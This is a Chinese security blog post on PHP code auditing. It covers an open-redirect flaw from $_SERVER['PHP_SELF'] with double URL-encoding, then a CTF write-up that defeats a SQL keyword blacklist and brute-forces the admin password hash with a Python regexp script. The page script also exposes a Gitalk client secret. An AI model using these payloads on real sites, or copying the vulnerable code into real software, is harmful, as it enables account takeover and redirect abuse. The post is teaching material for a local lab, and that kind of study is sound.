<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/tu.ico">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/tu.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/tu.ico">
  <link rel="mask-icon" href="/images/tu.ico" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"mayi077.github.io","root":"/","scheme":"Mist","version":"7.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":"ture","show_result":"ture","style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":"ture"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":"ture","mediumzoom":false,"lazyload":"ture","pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":3,"unescape":"ture","preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="漏洞源码1234567891011121314151617181920212223class Redirect &amp;#123;  private $websiteHost &#x3D; &#39;www.example.com&#39;;  private function setHeaders($url) &amp;#123;    $url &#x3D; urldecode($url);    head">
<meta property="og:type" content="article">
<meta property="og:title" content="代码审计-- $_SERVER[&#39;PHP_SELF&#39;]导致的防御失效问题">
<meta property="og:url" content="https://mayi077.github.io/2020/05/08/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-SERVER-PHP-SELF-%E5%AF%BC%E8%87%B4%E7%9A%84%E9%98%B2%E5%BE%A1%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/index.html">
<meta property="og:site_name" content="信安小蚂蚁">
<meta property="og:description" content="漏洞源码1234567891011121314151617181920212223class Redirect &amp;#123;  private $websiteHost &#x3D; &#39;www.example.com&#39;;  private function setHeaders($url) &amp;#123;    $url &#x3D; urldecode($url);    head">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-05-08T13:12:43.000Z">
<meta property="article:modified_time" content="2020-05-08T13:13:10.000Z">
<meta property="article:author" content="信安小蚂蚁">
<meta property="article:tag" content="代码审计">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://mayi077.github.io/2020/05/08/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-SERVER-PHP-SELF-%E5%AF%BC%E8%87%B4%E7%9A%84%E9%98%B2%E5%BE%A1%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>代码审计-- $_SERVER['PHP_SELF']导致的防御失效问题 | 信安小蚂蚁</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">信安小蚂蚁</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right"></div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-主页">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>主页</a>

  </li>
        <li class="menu-item menu-item-归档">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-分类">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-标签">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-关于">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://mayi077.github.io/2020/05/08/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-SERVER-PHP-SELF-%E5%AF%BC%E8%87%B4%E7%9A%84%E9%98%B2%E5%BE%A1%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.jpg">
      <meta itemprop="name" content="信安小蚂蚁">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="信安小蚂蚁">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          代码审计-- $_SERVER['PHP_SELF']导致的防御失效问题
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2020-05-08 21:12:43 / 修改时间：21:13:10" itemprop="dateCreated datePublished" datetime="2020-05-08T21:12:43+08:00">2020-05-08</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%9F%BA%E7%A1%80%E7%A7%AF%E7%B4%AF/" itemprop="url" rel="index">
                    <span itemprop="name">基础积累</span>
                  </a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>4.8k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>12 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="漏洞源码"><a href="#漏洞源码" class="headerlink" title="漏洞源码"></a>漏洞源码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">class Redirect &#123;</span><br><span class="line">  private $websiteHost &#x3D; &#39;www.example.com&#39;;</span><br><span class="line"></span><br><span class="line">  private function setHeaders($url) &#123;</span><br><span class="line">    $url &#x3D; urldecode($url);</span><br><span class="line">    header(&quot;Location: $url&quot;);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  public function startRedirect($params) &#123;</span><br><span class="line">    $parts &#x3D; explode(&#39;&#x2F;&#39;, $_SERVER[&#39;PHP_SELF&#39;]);</span><br><span class="line">    $baseFile &#x3D; end($parts);</span><br><span class="line">    $url &#x3D; sprintf(</span><br><span class="line">      &quot;%s?%s&quot;,</span><br><span class="line">      $baseFile,</span><br><span class="line">      http_build_query($params)</span><br><span class="line">    );</span><br><span class="line">    $this-&gt;setHeaders($url);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if ($_GET[&#39;redirect&#39;]) &#123;</span><br><span class="line">  (new Redirect())-&gt;startRedirect($_GET[&#39;params&#39;]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="漏洞解析"><a href="#漏洞解析" class="headerlink" title="漏洞解析"></a>漏洞解析</h3><h4 id="SERVER-‘PHP-SELF’"><a href="#SERVER-‘PHP-SELF’" class="headerlink" title="$_SERVER[‘PHP_SELF’]"></a>$_SERVER[‘PHP_SELF’]</h4><p>$_SERVER[‘PHP_SELF’] 表示当前 php 文件相对于网站根目录的位置地址，与 document root 相关。</p>
<p>假设我们有如下网址，$_SERVER[‘PHP_SELF’]得到的结果分别为：</p>
<p><a href="http://www.5idev.com/php/" target="_blank" rel="noopener">http://www.5idev.com/php/</a> ：/php/index.php<br><a href="http://www.5idev.com/php/index.php" target="_blank" rel="noopener">http://www.5idev.com/php/index.php</a> ：/php/index.php<br><a href="http://www.5idev.com/php/index.php?test=foo" target="_blank" rel="noopener">http://www.5idev.com/php/index.php?test=foo</a> ：/php/index.php<br><a href="http://www.5idev.com/php/index.php/test/foo" target="_blank" rel="noopener">http://www.5idev.com/php/index.php/test/foo</a> ：/php/index.php/test/foo</p>
<p>因此，可以使用 $_SERVER[‘PHP_SELF’] 很方便的获取当前页面的地址：</p>
<p>$url = “http://“.$_SERVER[‘HTTP_HOST’].$_SERVER[‘PHP_SELF’];</p>
<p>以上面的地址为例，得到的结果如下：</p>
<p><a href="http://www.5idev.com/php/index.php" target="_blank" rel="noopener">http://www.5idev.com/php/index.php</a></p>
<p>上面是简单获取 http 协议的当前页面 URL ，只是要注意该地址是不包含 URL 中请求的参数（?及后面的字串）的。如果希望得到包含请求参数的完整 URL 地址，请使用 $_SERVER[‘REQUEST_URI’] 。</p>
<h4 id="详细利用"><a href="#详细利用" class="headerlink" title="详细利用"></a>详细利用</h4><p>HP自带的$_SERVER[‘PHP_SELF’] 参数是可以控制的。其中 PHP_SELF 指当前的页面绝对地址，比如我们的网站：<a href="http://www.test.com/redict/index.php，那么PHP_SELF" target="_blank" rel="noopener">http://www.test.com/redict/index.php，那么PHP_SELF</a> 就是 /redict/index.php 。但有个小问题很多人没有注意到，当URL是PATH_INFO的时候，比如：<a href="http://www.test.com/redict/index.php/admin，那么PHP_SELF就是/redict/index.php/admin" target="_blank" rel="noopener">http://www.test.com/redict/index.php/admin，那么PHP_SELF就是/redict/index.php/admin</a> 也就是说，其实 PHP_SELF 有一部分是我们可以控制的。  </p>
<p>双编码问题：</p>
<p>URL本来是被浏览器编码过一次，服务器接收到来自浏览器URL请求的时候，会将URL解码一次，由于在程序中我们看到有 urldecode() 函数存在，它会再次解码一次URL，此时双编码URL就可以利用，用于绕过某些关键词检测。比如将 / 编码为： %252f   </p>
<p>漏洞利用：</p>
<p>比如我们要跳转到<a href="http://www.baidu.com" target="_blank" rel="noopener">www.baidu.com</a> ，那么就可以构造 Payload ：<a href="http://www.test.com/index.php/http:%252f%252fwww.baidu.com" target="_blank" rel="noopener">http://www.test.com/index.php/http:%252f%252fwww.baidu.com</a> ，访问即可重定向跳转到<a href="http://www.baidu.com" target="_blank" rel="noopener">http://www.baidu.com</a> 。</p>
<h3 id="CTF-题目"><a href="#CTF-题目" class="headerlink" title="CTF 题目"></a>CTF 题目</h3><p>index.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">include &quot;.&#x2F;config.php&quot;;</span><br><span class="line">include &quot;.&#x2F;flag.php&quot;;</span><br><span class="line">error_reporting(0);</span><br><span class="line"></span><br><span class="line">$black_list &#x3D; &quot;&#x2F;admin|guest|limit|by|substr|mid|like|or|char|union|select|greatest|%00|\&#39;|&quot;;</span><br><span class="line">$black_list .&#x3D; &quot;&#x3D;|_| |in|&lt;|&gt;|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep&#x2F;i&quot;;</span><br><span class="line">if(preg_match($black_list, $_GET[&#39;user&#39;])) exit(&quot;:P&quot;); </span><br><span class="line">if(preg_match($black_list, $_GET[&#39;pwd&#39;])) exit(&quot;:P&quot;); </span><br><span class="line"></span><br><span class="line">$query&#x3D;&quot;select user from users where user&#x3D;&#39;$_GET[user]&#39; and pwd&#x3D;&#39;$_GET[pwd]&#39;&quot;;</span><br><span class="line">echo &quot;&lt;h1&gt;query : &lt;strong&gt;&lt;b&gt;&#123;$query&#125;&lt;&#x2F;b&gt;&lt;&#x2F;strong&gt;&lt;br&gt;&lt;&#x2F;h1&gt;&quot;;</span><br><span class="line">$result &#x3D; $conn-&gt;query($query);</span><br><span class="line">if($result-&gt;num_rows &gt; 0)&#123;</span><br><span class="line">    $row &#x3D; $result-&gt;fetch_assoc();</span><br><span class="line">    if($row[&#39;user&#39;]) echo &quot;&lt;h2&gt;Welcome &#123;$row[&#39;user&#39;]&#125;&lt;&#x2F;h2&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$result &#x3D; $conn-&gt;query(&quot;select pwd from users where user&#x3D;&#39;admin&#39;&quot;);</span><br><span class="line">if($result-&gt;num_rows &gt; 0)&#123;</span><br><span class="line">    $row &#x3D; $result-&gt;fetch_assoc();</span><br><span class="line">    $admin_pass &#x3D; $row[&#39;pwd&#39;];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(($admin_pass)&amp;&amp;($admin_pass &#x3D;&#x3D;&#x3D; $_GET[&#39;pwd&#39;]))&#123;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>config.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">$servername &#x3D; &quot;localhost&quot;;</span><br><span class="line">$username &#x3D; &quot;root&quot;;</span><br><span class="line">$password &#x3D; &quot;root&quot;;</span><br><span class="line">$dbname &#x3D; &quot;day15&quot;;</span><br><span class="line">$conn &#x3D; new mysqli($servername, $username, $password, $dbname);</span><br><span class="line">if ($conn-&gt;connect_error) &#123;</span><br><span class="line">    die(&quot;连接失败: &quot;);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>flag.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$flag &#x3D; &quot;HRCTF&#123;Sql_and_byPass_WAF!&#125;&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>sql语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">DROP DATABASE IF EXISTS day15;</span><br><span class="line">CREATE DATABASE day15;</span><br><span class="line">USE day15;</span><br><span class="line">CREATE TABLE users (</span><br><span class="line">    id int(6) unsigned auto_increment primary key,</span><br><span class="line">    user varchar(20) not null,</span><br><span class="line">    pwd varchar(40) not null</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line">INSERT INTO users(user,pwd) VALUES(&#39;Lucia&#39;,&#39;82ebeafb2b5dede380a0d2e1323d6d0b&#39;);</span><br><span class="line">INSERT INTO users(user,pwd) VALUES(&#39;Admin&#39;,&#39;c609b5eda02acd7b163f500cb23b06b1&#39;);</span><br></pre></td></tr></table></figure>

<h3 id="CTF-题解"><a href="#CTF-题解" class="headerlink" title="CTF 题解"></a>CTF 题解</h3><p>&emsp;似乎这题和上面提到的漏洞没有半毛钱关系呀,完全就是一个sql注入的题目。<br>先来看看黑名单：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$black_list &#x3D; &quot;&#x2F;admin|guest|limit|by|substr|mid|like|or|char|union|select|greatest|%00|\&#39;|&quot;;</span><br><span class="line">$black_list .&#x3D; &quot;&#x3D;|_| |in|&lt;|&gt;|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep&#x2F;i&quot;;</span><br></pre></td></tr></table></figure>
<p>注意第二个式子是 <code>.=</code>就是把2个字符串连接起来。我们注意到没过滤<code>\</code>但是可以注释用的<code># -</code>都被过滤了，好在我们可以用<code>;%00</code>来进行注释。<br>例如，我们的payload为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?user&#x3D;\&amp;pwd&#x3D;||1;%00</span><br><span class="line">对应sql语句：</span><br><span class="line">select user from users where user&#x3D;&#39;\&#39; and pwd&#x3D;&#39;||1;&#39;</span><br></pre></td></tr></table></figure>
<p>嗯，这样就可以注入成功了。但是我们想要得到flag ，pwd就需要等于admin的pwd，我们可以使用regexp来正则一个一个爆破出来。例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">char_set &#x3D; &#39;0123456789abcdef&#39; #md5是16进制字符组成的字符串</span><br><span class="line">pw &#x3D; &#39;&#39;</span><br><span class="line">for a in range(32):</span><br><span class="line">    for ch in char_set:</span><br><span class="line">        url &#x3D; &#39;http:&#x2F;&#x2F;127.0.0.1&#x2F;day15&#x2F;index.php?user&#x3D;\&amp;pwd&#x3D;||pwd&#x2F;**&#x2F;regexp&#x2F;**&#x2F;&quot;^&#123;&#125;&quot;;%00&#39;</span><br><span class="line">        r &#x3D; requests.get(url&#x3D;url.format(pw+ch))</span><br><span class="line">        if &#39;Welcome Admin&#39; in r.text:</span><br><span class="line">            pw +&#x3D; ch</span><br><span class="line">            print(pw)</span><br><span class="line">            break</span><br></pre></td></tr></table></figure>
<p>然后我们输入这个pwd就可以了，如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?pwd&#x3D;c609b5eda02acd7b163f500cb23b06b1</span><br></pre></td></tr></table></figure>
<p>就可以看到flag了。</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>信安小蚂蚁
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://mayi077.github.io/2020/05/08/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-SERVER-PHP-SELF-%E5%AF%BC%E8%87%B4%E7%9A%84%E9%98%B2%E5%BE%A1%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/" title="代码审计-- $_SERVER[&#39;PHP_SELF&#39;]导致的防御失效问题">https://mayi077.github.io/2020/05/08/代码审计-SERVER-PHP-SELF-导致的防御失效问题/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/publicdomain/zero/1.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>ZERO</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

     <div>
       
         ﻿<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
         
      </div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag"><i class="fa fa-tag"></i>代码审计</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/05/08/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-%E4%BB%8E%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96%E5%88%B0getshell/" rel="prev" title="代码审计--从变量覆盖到getshell">
      <i class="fa fa-chevron-left"></i> 代码审计--从变量覆盖到getshell
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/05/09/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3-REQUESTS%E6%95%B0%E7%BB%84/" rel="next" title="代码审计 -- 深入理解$_REQUESTS数组">
      代码审计 -- 深入理解$_REQUESTS数组 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞源码"><span class="nav-number">1.</span> <span class="nav-text">漏洞源码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞解析"><span class="nav-number">2.</span> <span class="nav-text">漏洞解析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#SERVER-‘PHP-SELF’"><span class="nav-number">2.1.</span> <span class="nav-text">$_SERVER[‘PHP_SELF’]</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#详细利用"><span class="nav-number">2.2.</span> <span class="nav-text">详细利用</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CTF-题目"><span class="nav-number">3.</span> <span class="nav-text">CTF 题目</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CTF-题解"><span class="nav-number">4.</span> <span class="nav-text">CTF 题解</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="信安小蚂蚁"
      src="/images/1.jpg">
  <p class="site-author-name" itemprop="name">信安小蚂蚁</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">135</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">86</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="/487280636@qq.com" title="E-Mail → 487280636@qq.com"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="http://wpa.qq.com/msgrd?v=3&uin=487280636&site=qq&menu=yes" title="QQ → http:&#x2F;&#x2F;wpa.qq.com&#x2F;msgrd?v&#x3D;3&amp;uin&#x3D;487280636&amp;site&#x3D;qq&amp;menu&#x3D;yes" rel="noopener" target="_blank"><i class="fa fa-fw fa-instagram"></i>QQ</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/publicdomain/zero/1.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-zero.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">信安小蚂蚁</span>
</div>









        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1.8.0/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1.8.0/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'Ov23li6cOHoOwCcszzi9',
      clientSecret: '8f2a2156cf47355ba518edf71e62d5e1618dc229',
      repo        : 'mayi077.github.io',
      owner       : 'mayi077',
      admin       : ['mayi077'],
      id          : 'c4342ab87d587f79f633043908da7cbd',
        language: 'zh-CN',
      distractionFreeMode: true,
      enablePKCE: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
